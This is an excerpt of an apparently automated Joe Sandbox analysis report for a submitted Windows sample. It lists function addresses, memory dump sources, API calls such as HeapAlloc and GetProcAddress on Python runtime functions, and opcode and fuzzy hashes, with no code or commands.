                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: e302266983d598e0663e992107c0094a23fbe487e1e9b27af0ad8e5690f3ba44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21116F65A1C64281FA61FF6194007B9E360EFA5B84FC444B3EA4C57A9ECF3CD4018762
                                                                                                                                                                                                                              Function 00007FF7EAD26354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction ID: 870eb6fc6106efc71abb7fd260fe0838bba690b09f9ed7633e88a6430e8dadb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D21A132608B8186EB61EF28D440379B7A0FB84B54F9842B5EA5D876DDDF3CD401CB21
                                                                                                                                                                                                                              Function 00007FF7EAD103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 255d7391021efd3bdff95e3844f6d7295641bbccf7e78d129de294dd346b75f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D018261B0874940F504FB6299402A9E795FFA5FE0F894672DE5C17BDECE3CE4018311
                                                                                                                                                                                                                              Function 00007FF7EAD1EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF7EAD1B32A,?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A), ref: 00007FF7EAD1EBED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                              • Instruction ID: 073d31d3aa8517958e1066c480c02c0a709202f1d6a1eed3c9e79572b0961b62
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F06254B0920241FE59F67559993B5D399DFA8B40FCC45B2C90F463C9DD3CE4818232
                                                                                                                                                                                                                              Function 00007FF7EAD1D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF7EAD10C90,?,?,?,00007FF7EAD122FA,?,?,?,?,?,00007FF7EAD13AE9), ref: 00007FF7EAD1D63A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction ID: 4e75942390d74251708174c86bbe5854b8d2a36d7cea8b24552fb5be8cf2454a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0D450B0924A45FE65B7B158417759394DFA4BA0FC806B2D9BE862CADF3CA4808672

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF7EAD05830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05840
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05852
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05889
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0589B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058B4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058C6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058DF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058F1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0590D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0591F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0593B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0594D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05969
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0597B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05997
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059A9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059C5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction ID: 838a6403920f793cf825e78015ef6722e1d388e4f4ef0c52e758ecde8d02b0c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE22D274A09B0781FA05FB11A8507B4A7A5EF05749FD490F7E81E02268FFBCB948C272
                                                                                                                                                                                                                              Function 00007FF7EAD240AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction ID: 31f22b5283e2208df0158dfad9c53f70904a26db70fb98b4acc606cffb1b8dde
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16B2E6B2E182928BF766DE64D4407FDB7A1FB54348F805176DE0E57A8CDB38A900CB61
                                                                                                                                                                                                                              Function 00007FF7EAD0ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                              • Instruction ID: b3b414dd2fe38da3b937b09c1e45a012cba9e48af51e278f459f28b11157d669
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3522872A186A54BE7A4DF14D498BBE7BEAFB44344F81413AE64A877C4DB3CD804CB11
                                                                                                                                                                                                                              Function 00007FF7EAD0D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction ID: 7690faec4d4eb51db33b0a18cf866503fa47c1b85a6e53cf763e3c4af380cf83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E311072608B818AEB60DF60E8803ED7365FB94748F44407BDA4D47B98DF78D548C721
                                                                                                                                                                                                                              Function 00007FF7EAD25C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C45
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A909
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A92E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C34
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction ID: feef039ee7deb00c37f8ee75818b46884c4f7fb5df07af97e66af3a7906f4d7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1AE26A0824246F720FF25D881BB9A761EF94794FC481B7EA0D47699EE3CE441C772
                                                                                                                                                                                                                              Function 00007FF7EAD1A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction ID: 0de5e91adda5b643549efd4550c29c5ef072a380bc9a6c5675796fb433ce32cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A318236608F8185EB20DF24E8403AEB3A4FB94758F900136EA9D43B69DF3CD145CB11
                                                                                                                                                                                                                              Function 00007FF7EAD21874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
